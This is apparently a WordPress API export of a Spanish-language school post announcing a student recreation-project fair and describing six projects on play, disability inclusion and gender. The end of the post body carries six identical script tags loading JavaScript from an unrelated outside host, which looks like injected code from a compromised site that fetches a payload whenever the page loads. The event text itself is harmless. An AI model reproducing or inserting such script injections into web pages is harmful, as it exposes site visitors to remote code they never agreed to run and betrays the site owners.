{"id":1306,"date":"2017-07-07T00:00:00","date_gmt":"2017-07-07T03:00:00","guid":{"rendered":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/feria-de-proyectos-de-recreacion\/"},"modified":"2018-08-08T15:56:57","modified_gmt":"2018-08-08T18:56:57","slug":"feria-de-proyectos-de-recreacion","status":"publish","type":"post","link":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/feria-de-proyectos-de-recreacion\/","title":{"rendered":"Feria de Proyectos de Recreaci\u00f3n"},"content":{"rendered":"<p><strong>Se llev\u00f3 a cabo el 28 de junio en el marco del Taller de <em>Dise\u00f1o Integral de Proyectos de Recreaci\u00f3n<\/em>, a cargo de la profesora Patricia Lizarraga y lxs ayudantes Brenda Bottini, Martina Gentile y Mart\u00edn Colombo.<\/strong><\/p>\n<p>El Taller propone poner en juego, integrar y articular los saberes construidos por lxs estudiantes en las etapas previas de la formaci\u00f3n y en sus experiencias de pr\u00e1cticas, a partir del desarrollo de proyectos en Recreaci\u00f3n para el aprovechamiento creativo del Tiempo Libre en diferentes \u00e1mbitos y con diversas poblaciones y destinatarios.<br \/>\nEste cuatrimestre los Proyectos presentados fueron:<\/p>\n<p><strong>OJOS DE OTRO MIRAR<\/strong><br \/>\nCon este proyecto nos proponemos generar un abordaje cr\u00edtico, a trav\u00e9s de un dispositivo l\u00fadico, sobre los estereotipos que circulan en diferentes espacios educativos para personas con discapacidad, y las consecuencias que \u00e9stos tienen en las pr\u00e1cticas educativas.<em> Dario Villagra, Melody Marchese, Uriel Goldstein, Jesica de los Santos y Silvia Almaraz.<\/em><\/p>\n<p><strong>CRI (E) ANDO PUENTES<\/strong><br \/>\nEl proyecto busca aportar metodolog\u00edas, din\u00e1micas l\u00fadicas y juegos, a trav\u00e9s de la construcci\u00f3n colectiva de una caja de herramientas, para fortalecer un espacio de crianza para familias llevado adelante en el Jard\u00edn Comunitario Popular \u201cJard\u00edn de Teresa\u201d del barrio de Chacarita. <em>Silvina Alejandra Caputo, Johanna Carolina Hrynkow, Elizabeth Garc\u00eda Sale, Agostina Paradiso.<\/em><\/p>\n<p><strong>LA ACOSTECA<\/strong><br \/>\nProponemos la construcci\u00f3n de una juegoteca m\u00f3vil de y para chicxs y docentes de 6\u00b0 y 7\u00b0 grado del turno tarde de la ENS N\u00b0 2 Mariano Acosta, buscando promover el derecho a jugar a trav\u00e9s de un espacio l\u00fadico itinerante. <em>Noelia Peyraube, Jonathan Schenbari, Malena Szabo.<\/em><\/p>\n<p><strong>JUGANDO A LA GRANDE<\/strong><br \/>\nTe invitamos a jugar y te desafiamos a olvidarte de la rutina. Nuestro proyecto busca reivindicar el juego en lxs adultxs, brind\u00e1ndoles un espacio propicio dentro del Museo del Juguete. Te esperamos para jugar a lo grande. <em>Carla Bravo, Ayel\u00e9n Pa\u00e9z, Roc\u00edo Villanueva.<\/em><\/p>\n<p><strong>DISTINTOS E IGUALES<\/strong><br \/>\n\u00bfQu\u00e9 pensamos cuando hablamos de personas con discapacidad? \u00bfY de inclusi\u00f3n? El proyecto presenta una propuesta l\u00fadico-pedag\u00f3gica, pensada desde la recreaci\u00f3n educativa, que invita a reflexionar y problematizar la diferencia y la diversidad y que busca crear lazos a partir de un espacio que propicie las capacidades de todxs. <em>Alejandro Castro, Alejandra Castro, Paula Correa, Gabriel Mujica.<\/em><\/p>\n<p><strong>EL GEN DE LA NORMA<\/strong><br \/>\nEste proyecto se propone brindar talleres para educadores y educadoras, abordando sus pr\u00e1cticas cr\u00edticamente desde una perspectiva de g\u00e9nero y a trav\u00e9s de una propuesta l\u00fadico-pedag\u00f3gica. Parte del proceso implica la entrega de un libro, dise\u00f1ado y testeado durante el proyecto, con actividades recreativas y cuya implementaci\u00f3n permitir\u00e1 utilizar el juego como herramienta para poner en tensi\u00f3n la tem\u00e1tica en grupos de 9 a 13 a\u00f1os.<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se llev\u00f3 a cabo el 28 de junio en el marco del Taller de Dise\u00f1o Integral de Proyectos de Recreaci\u00f3n, a cargo de la profesora Patricia Lizarraga y lxs ayudantes Brenda Bottini, Martina Gentile y Mart\u00edn Colombo. El Taller propone poner en juego, integrar y articular los saberes construidos por lxs estudiantes en las etapas &#8230; <a title=\"Feria de Proyectos de Recreaci\u00f3n\" class=\"read-more\" href=\"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/feria-de-proyectos-de-recreacion\/\" aria-label=\"More on Feria de Proyectos de Recreaci\u00f3n\">[+]<\/a><\/p>\n","protected":false},"author":19,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[9],"tags":[],"acf":[],"_links":{"self":[{"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/posts\/1306"}],"collection":[{"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/comments?post=1306"}],"version-history":[{"count":2,"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/posts\/1306\/revisions"}],"predecessor-version":[{"id":2003,"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/posts\/1306\/revisions\/2003"}],"wp:attachment":[{"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/media?parent=1306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/categories?post=1306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/istlyr-caba.infd.edu.ar\/sitio\/wp-json\/wp\/v2\/tags?post=1306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}